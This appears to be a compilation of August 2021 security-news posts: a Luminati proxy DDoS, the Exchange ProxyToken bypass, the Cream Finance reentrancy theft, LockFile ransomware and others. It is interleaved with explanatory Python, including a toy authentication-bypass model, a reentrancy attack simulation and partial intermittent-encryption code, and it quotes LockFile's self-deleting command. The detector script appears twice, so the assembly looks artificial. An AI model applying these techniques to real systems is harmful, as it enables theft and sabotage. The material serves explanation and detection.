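LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str):
    """One log line -> dict with ip, hour bucket, method, path (query string dropped), status."""
    m = LOG_RX.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "hour": ts.strftime("%Y-%m-%dT%H"), "method": m["method"],
            "path": m["path"].split("?", 1)[0], "status": int(m["status"])}


def attack_clusters(lines, min_ips=3):
    """Group requests by (hour, method, path); keep groups with >= min_ips distinct sources.
    This is the 'attack cluster' definition used above: many IPs, same request, same hour."""
    groups = defaultdict(set)
    for line in lines:
        r = parse_line(line)
        if r:
            groups[(r["hour"], r["method"], r["path"])].add(r["ip"])
    return {key: ips for key, ips in groups.items() if len(ips) >= min_ips}


def rotation_ratio(clusters, method, path):
    """For consecutive hours of one request signature, the fraction of each hour's IPs
    that did not appear in the previous hour (1.0 = a completely fresh pool)."""
    hours = sorted(h for (h, m, p) in clusters if (m, p) == (method, path))
    out = {}
    for prev, cur in zip(hours, hours[1:]):
        before, now = clusters[(prev, method, path)], clusters[(cur, method, path)]
        out[cur] = len(now - before) / len(now)
    return out


def _line(ip, ts, method, path):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "python-requests/2.25.1"'


# Constructed log: five bots hit /resources at 10:00, a mostly new set of five at 11:00,
# plus one ordinary visitor per hour that must not form a cluster.
SAMPLE_LOG = (
    [_line(f"10.0.0.{i}", "20/Aug/2021:10:00:17 +0000", "POST", "/resources") for i in range(1, 6)]
    + [_line("192.0.2.50", "20/Aug/2021:10:05:00 +0000", "GET", "/index.html")]
    + [_line(f"10.0.0.{i}", "20/Aug/2021:11:00:02 +0000", "POST", "/resources") for i in (4, 6, 7, 8, 9)]
    + [_line("192.0.2.51", "20/Aug/2021:11:09:41 +0000", "GET", "/index.html")]
)

if __name__ == "__main__":
    clusters = attack_clusters(SAMPLE_LOG)
    for (hour, method, path), ips in sorted(clusters.items()):
        print(f"{hour} {method} {path}: {len(ips)} sources")
    print("rotation per hour:", rotation_ratio(clusters, "POST", "/resources"))
```

On real traffic the threshold `min_ips` needs to sit well above the number of distinct legitimate visitors a page sees per hour, and a rotation ratio close to 1.0 hour after hour is what distinguishes a rented rotating proxy pool from a fixed set of compromised hosts.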

Unexpected name resolution requests

What was strange was that while the attack was coming from Russia and Ukraine, many of these periodic DNS resolutions were instead coming from very different providers, specifically AS20473 Choopa and AS62567 DigitalOcean. So whatever was flooding us was resolving the domain karapatan.org from inside these providers.

Waves of attacks strongly geo-located using very few providers

By the second week of August 2021, we knew that the private proxy network inside of the Mobile Operators in Russia and Ukraine was speeding up their connections by making the name resolution of the targeted domain elsewhere.

Luminati Proxies as a DDoS botnet

A review of hundreds of servers in these DNS infrastructures revealed hundreds of proxies with the banner:

< HTTP/1.1 407 Proxy Authentication Required
< X-Luminati-Error: Proxy Authentication Required
< Proxy-Authenticate: Basic realm="Luminati"
< Date: Sat, 21 Aug 2021 10:49:31 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< Transfer-Encoding: chunked

Who is Bright Data (Luminati Networks)?

Bright Data (formerly Luminati) with headquarters in Netanya, Israel, offers access to millions of proxies in mobile operators, data centers and residential buildings and promises to “unlock any website & collect accurate data to make data-driven business decisions”. Their business practices have long been criticized for their use of mobile VPNs and other “backdoored” Mobile Apps to gain access to residential and mobile devices.

“Never get blocked” sales presentation from Bright Data/Luminati

Once we discovered what this “super proxy” infrastructure looked like, we could search for it in Censys and later discover the locations of thousands of these servers by looking at their associated domains: lum-superproxy.io and l-cdn.com.

We knew that the super-proxies had ports 7547 and 5000-44818 open. A simple Censys query on the HTTP header (16993.https.get.headers.proxy_authenticate=Luminati), or a Shodan search for “X-Luminati-Error”, was enough to find the main locations of the super-proxies.

Luminati’s documentation was also enlightening, as it was consistent with the DNS resolution anomaly.

Attacker connected to Luminati’s installed Proxy Manager from CC-Attack to flood Karapatan.org
Expert documentation from Luminati explaining the “resolve DNS at super proxy” feature

Thousands of rotating IPs flooding the website

The traffic patterns we recorded were consistent with new pools of IPs rotating every hour. At the beginning of our research, we speculated that this behaviour could be the result of a “pay as you go” stress-testing service that allowed a maximum of one hour of attack time. After several days of monitoring the website, we could determine that the traffic patterns were the result of Luminati automatically rotating its residential and mobile proxies on an hourly basis.

For weeks, Luminati was flooding the website with no fewer than 100 new IPs every hour and thousands of requests per second.
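The hourly rotation described above is easy to confirm once requests are bucketed by hour and path. The script below is an added example, not Qurium’s tooling: it parses combined-format web-server log lines (the sample lines are constructed, not real karapatan.org logs), builds the “attack clusters” defined earlier (IPs hitting the same path within the same hour), and reports how many clustered IPs in each hour were never seen in the previous hour. A new-IP ratio close to 1.0 hour after hour, with the same request pattern, is the rotating proxy-pool signature.

```python
"""Hourly IP-pool rotation detector over web-server access logs (added example)."""
from collections import defaultdict
from datetime import datetime
import re

# Constructed sample in combined-log format; two hours, same path, disjoint IP sets.
SAMPLE_LOG = """\
188.170.83.10 - - [10/Aug/2021:10:00:05 +0000] "GET /resources/ HTTP/1.1" 200 512
188.170.83.11 - - [10/Aug/2021:10:00:06 +0000] "POST /resources/ HTTP/1.1" 200 512
188.170.75.7 - - [10/Aug/2021:10:12:41 +0000] "GET /resources/ HTTP/1.1" 200 512
203.0.113.5 - - [10/Aug/2021:10:30:00 +0000] "GET /about HTTP/1.1" 200 3400
188.170.74.3 - - [10/Aug/2021:11:00:02 +0000] "GET /resources/ HTTP/1.1" 200 512
188.170.86.9 - - [10/Aug/2021:11:00:03 +0000] "POST /resources/ HTTP/1.1" 200 512
188.170.81.2 - - [10/Aug/2021:11:05:09 +0000] "GET /resources/ HTTP/1.1" 200 512
203.0.113.5 - - [10/Aug/2021:11:40:00 +0000] "GET /about HTTP/1.1" 200 3400
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_log(text):
    """Yield (hour_bucket, ip, method, path) for each parseable line; skip malformed ones."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield ts.replace(minute=0, second=0, microsecond=0), m["ip"], m["method"], m["path"]


def attack_clusters(text, min_ips=2):
    """{hour: {path: set(ips)}}, keeping only paths hit by at least min_ips IPs in that hour."""
    buckets = defaultdict(lambda: defaultdict(set))
    for hour, ip, _method, path in parse_log(text):
        buckets[hour][path].add(ip)
    return {
        hour: {path: ips for path, ips in paths.items() if len(ips) >= min_ips}
        for hour, paths in buckets.items()
    }


def rotation_report(text, min_ips=2):
    """For consecutive hours, count clustered IPs and how many are new since the previous hour.

    Returns a list of (hour, total_ips, new_ips, new_ratio) sorted by hour.
    """
    clusters = attack_clusters(text, min_ips)
    report, previous = [], set()
    for hour in sorted(clusters):
        current = set().union(*clusters[hour].values())
        new = current - previous
        ratio = len(new) / len(current) if current else 0.0
        report.append((hour, len(current), len(new), ratio))
        previous = current
    return report


def looks_like_rotating_pool(report, min_ratio=0.9):
    """True when every window after the first replaced at least min_ratio of its IPs."""
    return len(report) >= 2 and all(row[3] >= min_ratio for row in report[1:])


if __name__ == "__main__":
    rep = rotation_report(SAMPLE_LOG)
    for hour, total, new, ratio in rep:
        print(f"{hour:%Y-%m-%d %H:00}  ips={total}  new={new}  new_ratio={ratio:.2f}")
    print("rotating pool:", looks_like_rotating_pool(rep))
```

On real logs the interesting output is the sequence of new_ratio values: legitimate traffic from a fixed set of clients reuses addresses across hours, whereas a rotating proxy pool replaces almost all of them every window while the path and method mix stays identical.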

Number of Luminati IPs detected per hour in the last ten days of the attack

How much does the attack traffic cost?

Not surprisingly, this was the first time Qurium saw this infrastructure used for denial-of-service attacks, as Luminati traffic is far from cheap: one GB of traffic costs between 26 and 35 USD for mobile proxies and between 10 and 15 USD for residential proxies.

During the ten-day period 10-20 August 2021 alone, we estimated close to 10 TB (10,000 GB) of attack traffic coming from Luminati. Priced under Luminati’s “Plus” package, the attack adds up to the staggering figure of 260,000 USD for that 10-day period alone.

It is difficult to believe that an attacker launching billions of requests at a single website went undetected by Luminati for weeks. Only Bright Data / Luminati Networks can shed light on this case and explain to the general public how this “business deal” was arranged.

Luminati pricing model for monthly subscriptions.

Bright Data response to the abuse report

On 21 August 2021, an abuse report about the attack was sent to Bright Data (Luminati Networks). A sample of the flood traffic logs was shared with the company; it included 1,556 IP addresses from 68 networks of MTS and MegaFon.

Some of the prefixes we shared contained more than 50 IPs engaged in the floods.

Sample of the flood activity of prefix 188.170.83.0/24 (56 IPs) during the attack, 10-19 August 2021
Bright Data IPs  Network
56 188.170.83.0/24
55 188.170.75.0/24
54 188.170.74.0/24
49 188.170.86.0/24
49 188.170.81.0/24
49 188.170.80.0/24
48 188.170.77.0/24
47 188.170.76.0/24
47 188.170.73.0/24
46 188.170.84.0/24
42 188.170.87.0/24
42 188.170.82.0/24
38 188.170.78.0/24
37 188.170.72.0/24
36 188.170.79.0/24
35 188.170.85.0/24
28 95.153.129.0/24
28 213.87.157.0/24

After some email exchanges, in which Bright Data did not request any further evidence, we received this fascinating explanation on August 24th:

“The IPs from the list you have attached (attaching it again) belong to Bright Data, however we did not find any of them in the requests that were sent to the reported domain. Due to the lack of findings, we keep the reported domain blocked for all of our customers, and from all of our networks, therefore we expect no requests will be sent to it through our network. Thank you for your report and hope we managed to help you sufficiently”.

As in other cases in which we have traced back attack infrastructure, the email exchange ended with the familiar “No worries. We did not do it. It will not happen again”:

(…) we left the domain blocked so no traffic to karapatan.org will be going through our network. That way we can ensure you that no future abuse could be generated from our networks.

Original Post @ https://www.qurium.org/alerts/philippines/israeli-firm-bright-data-luminati-networks-enabled-the-attacks-against-karapatan/

About the author: Qurium Media Foundation is a Swedish non-profit digital security solutions provider, supporting independent media and human rights organizations in repressive regimes. Learn more at qurium.org or Twitter.


Pierluigi Paganini

(SecurityAffairs – hacking, DDoS)


US DoJ announces the creation of Cyber Fellowship Program

30 August 2021 at 14:40

The US DoJ announced a new Cyber Fellowship program for training prosecutors and attorneys on cybersecurity.

The US DoJ announced a new Cyber Fellowship program for training selected prosecutors and attorneys on cyber threats and threat actors.

The program is coordinated through the Criminal Division’s Computer Crime and Intellectual Property Section.

The training targets personnel from the department’s components that handle cyber matters, such as the Criminal Division and the U.S. Attorneys’ Offices.

The training will cover cybersecurity-related cases, such as the operations of state-sponsored threat actors and cybercrime organizations, and their tactics, techniques and procedures (TTPs).

“Today, Deputy Attorney General Lisa Monaco announced the creation of a new Cyber Fellowship program, designed to develop a new generation of prosecutors and attorneys equipped to handle emerging national security threats.” reads the announcement published by DoJ. “Fellows can expect to investigate and prosecute state-sponsored cyber threats; transnational criminal groups; infrastructure and ransomware attacks; and the use of cryptocurrency and money laundering to finance and profit from cyber-based crimes.”

The program requires all fellows to obtain a Top Secret security clearance and to commit for the full three-year duration of the program. The training will be held in the Washington, D.C. area.

“As we have witnessed this past year, cyber threats pose a significant and increasing risk to our national security, our economic security, and our personal security,” said Deputy Attorney General Monaco. “We need to develop the next generation of prosecutors with the training and experience necessary to combat the next generation of cyber threats. This Fellowship gives attorneys a unique opportunity to gain the well-rounded experience they need to tackle the full range of those threats.”

The DoJ also states that fellowships may be extended or converted to permanent positions without further competition; participants may also reapply to the Honors Program in a subsequent year or apply for permanent positions within the department.

The deadline for prosecutors and attorneys to take part in the Cyber Fellowship program is September 8.

Those interested in the program can apply through the Justice Department’s Honors Program application portal; applicants to this year’s Honors Program should indicate whether they would like to be considered for the Cyber Fellowship.


Pierluigi Paganini

(SecurityAffairs – hacking, FIN8)


Microsoft Exchange ProxyToken flaw can allow attackers to read your emails

31 August 2021 at 10:16

ProxyToken is a serious vulnerability in Microsoft Exchange Server that could allow unauthenticated attackers to access emails from a target account.

Technical details of a serious vulnerability in the Microsoft Exchange Server, dubbed ProxyToken (CVE-2021-33766), were publicly disclosed. The issue could be exploited by an unauthenticated attacker to access emails from a target account.

An attacker can trigger the flaw by sending a specially crafted request to web services within the Exchange Control Panel (ECP) application and access messages from a victim’s inbox.

An attacker could exploit the issue to access mailbox settings and set up an email forwarding rule in order to receive the messages sent to the victim.

As a pre-requisite for the attack, the attacker needs to have an account on the same Exchange server as the victim.

“This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability.” reads the advisory published by the Zero Day Initiative (ZDI). “The specific flaw exists within the authentication of requests to web services within the ecp web application. By issuing a crafted request, an attacker can bypass authentication. An attacker can leverage this vulnerability to disclose information from the server.”

The vulnerability was discovered by Le Xuan Tuyen from the Information Security Center of Vietnam Posts and Telecommunications Group (VNPT-ISC) in March.

The researcher noticed that Outlook Web Access and the Exchange Control Panel are served by a front-end site that proxies requests, including their authentication, to the Exchange back end.

When the “Delegated Authentication” feature is active on a Microsoft Exchange installation, the front end forwards the requests that need authentication to the back end. A request within ‘/ecp’ that carries a non-empty ‘SecurityToken’ cookie is treated as delegated: the front end leaves the authentication decision to the back end.

“Thus, for requests within /ecp, if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. Code on the back end that examines and validates the SecurityToken cookie is found in the class Microsoft.Exchange.Configuration.DelegatedAuthentication.DelegatedAuthenticationModule” reads the analysis published by ZDI. “As you can see, in a default configuration of the product, a <remove> element appears, so that the module DelegatedAuthModule will not be loaded at all for the back-end ECP site.”

In other words, in a default configuration of the product the DelegatedAuthModule is not loaded at all for the back-end ECP site, so the back end never performs the check that the front end has just delegated to it.

“In summary, when the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request. Meanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.” continues the analysis.

One more hurdle stands in the way: each request to an /ecp page must carry a ticket known as the “ECP canary”, and a request without it is answered with an HTTP 500. However, the researcher noticed that the 500 error response is itself accompanied by a valid canary, which can then be reused to issue an unauthenticated request.
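The root cause is a split-responsibility authentication decision in which each tier assumes the other one will check. The model below is an added illustration, not Exchange code: the functions, the cookie value and the “valid-token” stand-in are assumptions, but the decision logic mirrors the behaviour described above (front end delegates on the mere presence of a SecurityToken cookie; back end only validates when its delegated-auth module is loaded, and that module is loaded only when delegated authentication was configured). The fail-closed variant shows the check a hardened design needs: never hand off a decision to a component that is not configured to make it.

```python
"""Toy model of the ProxyToken front-end/back-end authentication chain (added example)."""
from dataclasses import dataclass, field


@dataclass
class Request:
    path: str
    cookies: dict = field(default_factory=dict)
    valid_credentials: bool = False   # did the caller present good credentials?


def front_end(req, delegation_configured, fail_closed):
    """Return 'allow', 'deny' or 'delegate'.

    Vulnerable behaviour (fail_closed=False): a SecurityToken cookie on an /ecp
    request hands the decision to the back end regardless of configuration.
    Fixed behaviour (fail_closed=True): delegate only when delegated auth is
    actually configured for this deployment; otherwise authenticate here.
    """
    if req.path.startswith("/ecp") and req.cookies.get("SecurityToken"):
        if not fail_closed or delegation_configured:
            return "delegate"
    return "allow" if req.valid_credentials else "deny"


def back_end(req, delegation_configured):
    """The delegated-auth module is loaded only when the feature was configured."""
    module_loaded = delegation_configured
    if not module_loaded:
        return "allow"   # nothing on the back end examines the token: it sails through
    # Stand-in for the module's token validation (assumption, not Exchange's check).
    return "allow" if req.cookies.get("SecurityToken") == "valid-token" else "deny"


def decide(req, delegation_configured=False, fail_closed=False):
    """Run a request through both tiers and return the final verdict."""
    verdict = front_end(req, delegation_configured, fail_closed)
    if verdict == "delegate":
        verdict = back_end(req, delegation_configured)
    return verdict


if __name__ == "__main__":
    forged = Request("/ecp/", cookies={"SecurityToken": "anything"})
    print("default config, vulnerable :", decide(forged))
    print("default config, fail closed:", decide(forged, fail_closed=True))
    print("delegation on, bad token   :", decide(forged, delegation_configured=True))
```

The first line of output is the bug: with the product’s default configuration an unauthenticated request carrying any non-empty SecurityToken cookie is allowed, because the front end delegates and the back end has nothing loaded to deny it. Once delegated authentication is actually configured, the back-end module validates the token and the forged cookie is rejected.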


Microsoft addressed the ProxyToken flaw in its July 2021 security updates. The issue carries a CVSS score of 7.5; the moderate rating reflects that, to abuse the flaw for mail forwarding, the attacker needs an account on the same Exchange server as the victim.

BleepingComputer reported that some researchers had already observed exploitation attempts in the preceding weeks.

Below is a tweet published by security researcher Rich Warren of NCC Group:

Most of the in the wild exploit attempts I have seen for this are from August 10th https://t.co/k9AH80uHw4 pic.twitter.com/oYaE1KB2II

— Rich Warren (@buffaloverflow) August 30, 2021


Pierluigi Paganini

(SecurityAffairs – hacking, ProxyToken)


Threat actors stole $29 million worth of crypto assets from Cream Finance

31 August 2021 at 11:53

Crooks have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform.

Threat actors have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform.

C.R.E.A.M. Finance is a decentralized lending protocol for individuals, institutions and protocols to access financial services. It promises earnings to users who are passively holding ETH or wBTC.

The security breach was confirmed by the company with a message via Twitter:

C.R.E.A.M. v1 market on Ethereum has suffered an exploit, resulting in a loss of 418,311,571 in AMP and 1,308.09 in ETH, by way of reentrancy on the AMP token contract.

We have stopped the exploit by pausing supply and borrow on AMP. No other markets were affected.

— Cream Finance 🍦 (@CreamdotFinance) August 30, 2021

The blockchain security firm PeckShield first spotted the attack and published a series of Tweets containing evidence of the security breach.

1/4 @CreamFinance was exploited in (one hack tx: https://t.co/JPW7e368qd), leading to the gain of ~$18.8M for the hacker.

— PeckShield Inc. (@peckshield) August 30, 2021

According to Cream Finance, the attackers carried out a reentrancy attack, funded through a flash loan, to steal 418,311,571 AMP tokens and 1,308.09 ETH.

“The AMP token contract implements ERC77-based ERC1820, which has the _callPreTransferHooks for reentrancy. Thank you @peckshield for assisting with this investigation.” states the DeFi platform.

In a reentrancy attack, a contract hands control to an external contract (here, through a token transfer hook) before it has updated its own state, and the external contract calls back into the original function, which still sees the stale state; the attacker can thus borrow or withdraw repeatedly before the first transaction’s effects are recorded.

According to PeckShield, the attackers exploited a reentrancy bug reachable through the ERC777-style transfer hooks of the AMP token contract on the Ethereum blockchain, which Cream Finance’s lending market did not guard against.

3/4 Specifically, in the example tx, the hacker makes a flashloan of 500 ETH and deposit the funds as collateral. Then the hacker borrows 19M $AMP and makes use of the reentrancy bug to re-borrow 355 ETH inside $AMP token transfer(). Then the hacker self-liquidates the borrow. pic.twitter.com/ryVX2RoxhJ

— PeckShield Inc. (@peckshield) August 30, 2021
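The sequence in PeckShield’s tweet (borrow, get called back from inside the token transfer, borrow again before the first debt is recorded) can be reproduced in a few dozen lines. The simulation below is an added example, not Cream Finance’s or AMP’s contract code: the pool, token and attacker are toy Python models, and the numbers are constructed. The vulnerable pool performs the token transfer (the interaction, which fires the recipient’s hook) before it records the debt (the effect); the hardened pool records the effect first, the checks-effects-interactions ordering, so the nested borrow fails the collateral check.

```python
"""Reentrancy through a token transfer hook, simulated (added example)."""


class HookedToken:
    """Toy token whose transfer() calls the recipient's tokens_received hook, ERC777-style."""

    def __init__(self):
        self.balances = {}

    def balance_of(self, who):
        return self.balances.get(who, 0)

    def mint(self, who, amount):
        self.balances[who] = self.balance_of(who) + amount

    def transfer(self, sender, recipient, amount):
        if self.balance_of(sender) < amount:
            raise ValueError("insufficient balance")
        self.balances[sender] -= amount
        self.balances[recipient] = self.balance_of(recipient) + amount
        hook = getattr(recipient, "tokens_received", None)
        if hook is not None:
            hook(amount)   # control passes to the recipient in the middle of the caller's logic


class LendingPool:
    """Lends the pool's own tokens against deposited collateral; debt may not exceed collateral."""

    def __init__(self, token, effects_before_interaction):
        self.token = token
        self.collateral = {}
        self.debt = {}
        self.effects_before_interaction = effects_before_interaction
        token.mint(self, 1_000)   # pool liquidity (constructed)

    def deposit(self, user, amount):
        self.collateral[user] = self.collateral.get(user, 0) + amount

    def borrow(self, user, amount):
        # check
        if self.debt.get(user, 0) + amount > self.collateral.get(user, 0):
            raise ValueError("undercollateralised")
        if self.effects_before_interaction:
            self.debt[user] = self.debt.get(user, 0) + amount   # effect
            self.token.transfer(self, user, amount)              # interaction
        else:
            self.token.transfer(self, user, amount)              # interaction first: the bug
            self.debt[user] = self.debt.get(user, 0) + amount    # effect recorded too late


class Attacker:
    """Contract whose transfer hook re-enters borrow() a bounded number of times."""

    def __init__(self, pool, amount, max_reentries):
        self.pool, self.amount, self.max_reentries = pool, amount, max_reentries
        self.reentries = 0

    def tokens_received(self, _amount):
        if self.reentries < self.max_reentries:
            self.reentries += 1
            try:
                self.pool.borrow(self, self.amount)   # debt not yet recorded in the buggy pool
            except ValueError:
                pass   # the hardened pool rejects the nested borrow

    def attack(self):
        self.pool.deposit(self, self.amount)
        self.pool.borrow(self, self.amount)


def run(effects_before_interaction, collateral=100, max_reentries=3):
    """Return (tokens the attacker ended up with, debt the pool eventually recorded)."""
    token = HookedToken()
    pool = LendingPool(token, effects_before_interaction)
    attacker = Attacker(pool, collateral, max_reentries)
    attacker.attack()
    return token.balance_of(attacker), pool.debt.get(attacker, 0)


if __name__ == "__main__":
    print("interaction before effect:", run(False))   # 400 tokens against 100 collateral
    print("effect before interaction:", run(True))    # 100 tokens against 100 collateral
```

With 100 units of collateral and three re-entries, the buggy ordering lets the attacker walk away with 400 tokens; the pool does record 400 of debt afterwards, but the collateral check never saw it. Recording the debt before the transfer, or a reentrancy guard on borrow(), closes the window.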

DeFi attacks are becoming very profitable for threat actors: according to a recent report by CipherTrace, DeFi-related hacks totalled $361 million by July 2021 and accounted for 76% of all major hacks in 2021.

“By July 2021, DeFi-related hacks total $361 million, already making up three-quarters of the total hack volume this year—a 2.7x increase from 2020. DeFi-related fraud continues to rise, as well. At the time of this report, DeFi-related fraud accounted for 54% of major crypto fraud volume, whereas last year DeFi-related fraud only made up 3% of the year’s total.” states CipherTrace.


Pierluigi Paganini

(SecurityAffairs – hacking, DeFi)


HPE warns customers of Sudo flaw in Aruba AirWave Management Platform

31 August 2021 at 14:48

Hewlett Packard Enterprise (HPE) warns of a vulnerability in Sudo open-source program used in its Aruba AirWave management platform.

Hewlett Packard Enterprise (HPE) is warning of a high-severity privilege escalation vulnerability in Sudo open-source program used within its Aruba AirWave management platform. The Aruba AirWave management platform is a real-time monitoring and security alert platform designed by HPE.

Any unprivileged local user, without needing a password, could exploit the vulnerability to gain root privileges on a vulnerable host.

“A vulnerability in the command line parameter parsing code of sudo could allow an attacker with access to sudo to execute commands or binaries with root privileges. The main impact of this vulnerability would be as part of a “chained attack” where an attacker has achieved a foothold with lower privileges via another vulnerability and then uses this to escalate privileges.” reads the security advisory.

In practice, an attacker who has already obtained a low-privileged foothold on the system through another vulnerability could chain this flaw to escalate to root.

CVE-2021-3156 was discovered by Qualys researchers in January 2021; it allows any local user to gain root privileges on Unix-like operating systems without authentication.

Sudo is one of the most important, powerful, and commonly used utilities that comes as a core command pre-installed on macOS and almost every UNIX or Linux-based operating system.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

The Sudo CVE-2021-3156 vulnerability, dubbed Baron Samedit, is a heap-based buffer overflow that was reported to the Sudo maintainers on January 13th and publicly disclosed at the end of January, giving the development team time to address the issue.

HPE confirmed that the flaw affects AirWave management platform versions prior to 8.2.13.0, which was released on June 18, 2021.

HPE also provided a workaround for AirWave customers and pointed out that Aruba is not aware of any in-the-wild attacks against Aruba products exploiting this vulnerability.

“To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for AirWave be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above.” concludes the advisory.


Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-3156)


Threat actors can remotely disable Fortress S03 Wi-Fi Home Security System

31 August 2021 at 19:39

Rapid7 researchers discovered two flaws that can be exploited by attackers to remotely disable one of the home security systems offered by Fortress Security Store.

Researchers at cybersecurity firm Rapid7 discovered two vulnerabilities that can be exploited by hackers to remotely disarm the Fortress S03 WiFi Security System manufactured by Fortress Security Store.

Fortress S03 Wi-Fi Home Security System

The Fortress S03 Wi-Fi Home Security System allows users to build their own alarm system to secure their homes and small businesses. It supports security cameras, window and door sensors, glass break sensors, vibration and motion sensors, and smoke/gas/water alarms.

The company states that it serves thousands of customers.

The flaws, tracked as CVE-2021-39276 (CVSS score: 5.3) and CVE-2021-39277 (CVSS score: 5.7), can be abused by a threat actor to gain unauthorized access to the system.

Both issues were reported by cybersecurity firm Rapid7 in May 2021.

“Rapid7 researcher Arvind Vishwakarma discovered multiple vulnerabilities in the Fortress S03 WiFi Home Security System. These vulnerabilities could result in unauthorized access to control or modify system behavior, and access to unencrypted information in storage or in transit.” reads the post published by Rapid7.

CVE-2021-39276 is an insecure cloud API deployment, while CVE-2021-39277 allows anyone within radio frequency (RF) signal range to capture and replay RF signals to alter the system’s behavior.

“CVE-2021-39276 describes an instance of CWE-287; specifically, it describes an insecure cloud API deployment which allows unauthenticated users to trivially learn a secret that can then be used to alter the system’s functionality remotely.” continues the post. “It has an initial CVSS score of 5.3 (medium). CVE-2021-39277 describes an instance of CWE-294, a vulnerability where anyone within Radio Frequency (RF) signal range could capture and replay RF signals to alter systems behavior, and has an initial CVSS score of 5.7.”

An attacker who knows the targeted user’s email address can query the API with it and obtain the IMEI number associated with the security system. With the IMEI, the attacker can send unauthenticated POST requests that change the system’s behavior, including disarming it.

The CVE-2021-39277 flaw can be exploited to launch a radio frequency (RF) signal replay attack because communications between different components of the home security system are not properly protected.

An attacker in the radio range of the target can capture command-and-control signals over the air, such as a command to disarm the system, and then replay them at a later time.

Below is the disclosure timeline for the two flaws:

  • May, 2021: Issues discovered by Arvind Vishwakarma of Rapid7
  • Thu, May 13, 2021: Initial contact to Fortress support email
  • Thu, May 13, 2021: Ticket #200781 created
  • Mon, May 24, 2021: Ticket #200781 closed by Fortress
  • Wed, Aug 18, 2021: Rapid7 created a follow up ticket, #203001, with vulnerability details and a reiteration of intent to publish
  • Tue, Aug 31, 2021: Published disclosure


Pierluigi Paganini

(SecurityAffairs – hacking, Fortress)


LockFile Ransomware uses a new intermittent encryption technique

31 August 2021 at 22:31

The recently emerged LockFile ransomware family uses a novel technique called intermittent encryption to speed up encryption and evade detection.

The LockFile ransomware gang started its operations last month and was recently spotted targeting Microsoft Exchange servers through the recently disclosed ProxyShell vulnerabilities. Security researcher Kevin Beaumont was one of the first to report that the LockFile operators use the Microsoft Exchange ProxyShell and Windows PetitPotam vulnerabilities to take over Windows domains.

Sophos researchers discovered that the group is now leveraging a new technique called “intermittent encryption” to speed up the encryption process.

LockFile encrypts alternate blocks of 16 bytes in a document and leaves the rest untouched, which both speeds up encryption and evades detection tools that look for encrypted content. This is the first time Sophos experts have seen this approach used in a ransomware attack.

“Partial encryption is generally used by ransomware operators to speed up the encryption process and we’ve seen BlackMatter, DarkSide and LockBit 2.0 ransomware implement this technique,” said Mark Loman, director of engineering at Sophos. “What sets LockFile apart is that, unlike the others, it doesn’t encrypt the first few blocks. Instead, LockFile encrypts every other 16 bytes of a document. This means that a file such as a text document remains partially readable and looks statistically like the original. This trick can be successful against ransomware detection software that relies on inspecting content using statistical analysis to detect encryption.”

Sophos experts spotted the new technique while analyzing a LockFile sample (SHA-256 hash: bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce) that was uploaded to VirusTotal on August 22, 2021.

The ransomware uses Windows Management Instrumentation (WMI) to terminate critical processes associated with virtualization software and databases, removing any file locks that could interfere with encryption.

The ransom note is an HTML Application (HTA) file (e.g., ‘LOCKFILE-README-[hostname]-[id].hta’) that is dropped in the root of the drive. The HTA ransom note used by LockFile closely resembles the one used by LockBit 2.0 ransomware:


The victims of the Lockfile ransomware gang are in the manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors.

The ransom note used by the LockFile gang is similar to the one used by the LockBit ransomware operators and references the Conti gang in the contact email address ([email protected][.]com).

Once the files are encrypted, the ransomware appends the .lockfile extension to the encrypted files’ names and deletes its own binary from the system.

“Once it has encrypted all the documents on the machine, the ransomware deletes itself with the following command:

cmd /c ping 127.0.0.1 -n 5 && del “C:\Users\Mark\Desktop\LockFile.exe” && exit

The PING command sends five ICMP messages to the localhost (i.e., itself), and this is simply intended as a five second sleep to allow the ransomware process to close itself before executing the DEL command to delete the ransomware binary.” states Sophos. “This means that after the ransomware attack, there is no ransomware binary for incident responders or antivirus software to find or clean up.”
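The reason alternate-block encryption fools statistical detectors is easy to measure. The script below is an added example, not LockFile’s code: the keystream is a stand-in (SHA-256 in counter mode, not the ransomware’s cipher), the document is constructed prose, and the entropy threshold is an assumption about how a naive detector might be tuned. It encrypts every other 16-byte block as Sophos describes, then compares a whole-file Shannon-entropy check and a printable-byte ratio for the original, the fully encrypted and the intermittently encrypted file.

```python
"""Intermittent (alternate 16-byte block) encryption versus entropy-based detection (added example)."""
import hashlib
import math

BLOCK = 16


def keystream(key, length):
    """Deterministic pseudo-random bytes: SHA-256(key || counter) blocks, concatenated."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(data, ks):
    return bytes(a ^ b for a, b in zip(data, ks))


def encrypt_full(data, key):
    """Encrypt every byte (what most ransomware, and a statistical detector, expects)."""
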